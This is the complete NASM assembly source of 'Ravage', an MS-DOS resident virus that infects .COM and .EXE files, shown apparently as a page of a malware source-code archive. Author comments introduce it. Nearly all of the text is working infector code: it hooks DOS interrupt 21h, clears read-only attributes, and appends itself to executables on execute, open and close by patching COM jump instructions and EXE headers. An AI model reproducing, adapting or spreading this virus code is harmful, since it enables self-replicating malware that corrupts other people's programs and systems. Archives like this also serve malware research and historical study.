MalwareSourceCode/MSDOS/R-Index/Virus.MSDOS.Unknown.ravage.asm

254 lines
5.6 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
; Virusname: Ravage
; Origin: Sweden
; Author: Metal Militia
; This virus can be found with any anti-virus program, since it's been
; around for a while now. (SCAN/TB-SCAN/F-PROT/SOLOMON, that is..)
; It's a resident .COM and .EXE infector, without any encryption or
; stealth capabilities. It infects when you execute (4bh), opens (3dh),
; extended open (6ch), and on closing (3eh). This makes it quite a good
; infector, but since it doesn't care what files it infects, most of the
; AV programs will find themselves makes it quite a good infector, but
; any program with selfchecking (95%) will find themself hit.
; I stopped with this virus since it's so totally buggy that you'll find
; it almost at once. This is the reason why i give you the source code.
; In my later resident things, there will be such things as encryption,
; stealth etc. i think..
.model tiny
.code
.radix 16
.code
EXE_ID = -42
viruslength = heap - _small
startload = 90 * 4
_small:
call relative
oldheader dw 020cdh
dw 0bh dup (0)
relative:
pop bp
push ds
push es
xor ax,ax
mov ds,ax
mov es,ax
mov di,startload
cmp word ptr ds:[di+25],di
jz exit_small
lea si,[bp-3]
mov cx,viruslength
db 2Eh
rep movsb
mov di,offset old21 + startload
mov si,21*4
push si
movsw
movsw
pop di
mov ax,offset int21 + startload
stosw
xchg ax,cx
stosw
exit_small:
pop es
pop ds
or sp,sp
jnp returnCOM
returnEXE:
mov ax,ds
add ax,10
add [bp+16],ax
add ax,[bp+0e]
mov ss,ax
mov sp,cs:[bp+10]
jmp dword ptr cs:[bp+14]
returnCOM:
mov di,100
push di
mov si,bp
movsw
movsb
ret
infect:
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
mov ax,4300h
int 21h
jnc test_it
jmp exitinfect
test_it:
test cl,1
je ok_2_open
and cl,0feh
mov ax,4301h
int 21h
jnc ok_2_open
jmp exitinfect
ok_2_open:
mov ax,3d02
int 21
xchg ax,bx
push cs
pop ds
push cs
pop es
mov ax,5700h
int 21h
push cx
push dx
mov si,offset oldheader+startload
mov ah,3f
mov cx,18
push cx
mov dx,si
int 21
cmp ax,cx
jnz go_already_infected
mov di,offset target + startload
push di
rep movsb
pop di
mov ax,4202
cwd
int 21
cmp ds:[di],'ZM'
jz infectEXE
cmp ds:[di],'MZ'
jz infectEXE
sub ax,3
mov byte ptr ds:[di],0e9
mov ds:[di+1],ax
sub ax,viruslength
cmp ds:[si-17],ax
jnz finishinfect
go_already_infected:
pop cx
jmp short already_infected
int21:
cmp ax,4b00
jz infect
cmp ax,3d00
jz infect
cmp ax,3e00
jz some_open
cmp ax,6c00
jnz not_opening
some_open:
mov ah,45
int 21
jmp infect
not_opening:
jmp chain
infectEXE:
cmp word ptr [di+10],EXE_ID
jz go_already_infected
push ax
push dx
add ax,viruslength
adc dx,0
mov cx,200
div cx
or dx,dx
jz nohiccup
inc ax
nohiccup:
mov word ptr ds:[di+4],ax
mov word ptr ds:[di+2],dx
pop dx
pop ax
mov cx,10
div cx
sub ax,ds:[di+8]
mov word ptr ds:[di+14],dx
mov word ptr ds:[di+16],ax
mov word ptr ds:[di+0e],ax
mov word ptr ds:[di+10],EXE_ID
finishinfect:
mov cx,viruslength
mov ah,40
mov dx,startload
int 21
mov ax,4200
xor cx,cx
cwd
int 21
mov ah,40
mov dx,di
pop cx
int 21
already_infected:
pop dx
pop cx
mov ax,5701h
int 21h
mov ah,3e
int 21
jmp exitinfect
db 'RAVAGE! '
db '(c) Metal Militia / Immortal Riot'
exitinfect:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
chain:
db 0ea
heap:
old21 dw ?, ?
target dw 0ch dup (?)
endheap:
2021-01-12 23:55:26 +00:00
end _small